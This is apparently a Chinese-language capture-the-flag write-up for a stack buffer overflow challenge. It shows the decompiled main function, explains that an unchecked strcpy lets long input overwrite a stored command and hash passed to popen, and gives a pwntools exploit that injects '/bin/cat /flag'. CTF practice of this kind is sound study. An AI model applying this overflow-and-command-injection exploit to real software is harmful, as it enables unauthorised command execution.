栈内溢出的题
读完程序也就完事了
__int64 __fastcall main(int a1, char **a2, char **a3)
{
char *v3; // rax
unsigned __int8 *v4; // rbp
char *v5; // rbx
__int64 v6; // rcx
char *v7; // rdi
unsigned int v8; // er12
FILE *v9; // rbp
size_t v11; // [rsp+0h] [rbp-308h] BYREF
char *lineptr; // [rsp+8h] [rbp-300h] BYREF
char dest[256]; // [rsp+10h] [rbp-2F8h] BYREF 输入的待加密的明文
char v14[27]; // [rsp+110h] [rbp-1F8h] BYREF 初始化放入的命令
char v15[65]; // [rsp+12Bh] [rbp-1DDh] BYREF 初始化放入的sha256值
_QWORD v16[4]; // [rsp+16Ch] [rbp-19Ch] BYREF
char v17[64]; // [rsp+18Ch] [rbp-17Ch] BYREF 用户输入前0x100加密后的sha256值
int v18; // [rsp+1CCh] [rbp-13Ch] BYREF
char s[264]; // [rsp+1D0h] [rbp-138h] BYREF
unsigned __int64 v20; // [rsp+2D8h] [rbp-30h]
v20 = __readfsqword(0x28u);
sub_E60(dest); // md5值放到v15
v11 = 0LL;
lineptr = 0LL;
if ( getline(&lineptr, &v11, stdin) == -1 )
return 1;
v3 = strrchr(lineptr, 10);
if ( !v3 )
return 1;
*v3 = 0;
v4 = (unsigned __int8 *)v16;
v5 = v17;
strcpy(dest, lineptr);
sub_DD0((__int64)dest, v16, 0x100u); // 对前0x100串加密
do
{
v6 = *v4;
v7 = v5;
v5 += 2;
++v4;
snprintf(v7, 3uLL, "%02x", v6);
}
while ( v5 != (char *)&v18 );
v8 = strcmp(v15, v17);
if ( v8 )
{
puts("wrong password!");
return 1;
}
v9 = popen(v14, "r");
if ( !v9 )
return 1;
while ( fgets(s, 256, v9) )
printf("%s", s);
fclose(v9);
return v8;
}
程序先把一个命令和md5值放入v14,v15处。然后用户输入值放到desc处(v14前)。在这里只要通过输入超长将v14,v15覆盖即可。
from pwn import *
p = process('./pwn')
elf = ELF('./pwn')
context(arch = 'amd64', log_level = 'debug') #
payload = b'A'*(256)+ b'/bin/cat /flag;'.ljust(27, b'#')+b'e075f2f51cad23d0537186cfcd50f911ea954f9c2e32a437f45327f1b7899bbb'
p.sendline(payload)
p.recv()
pause()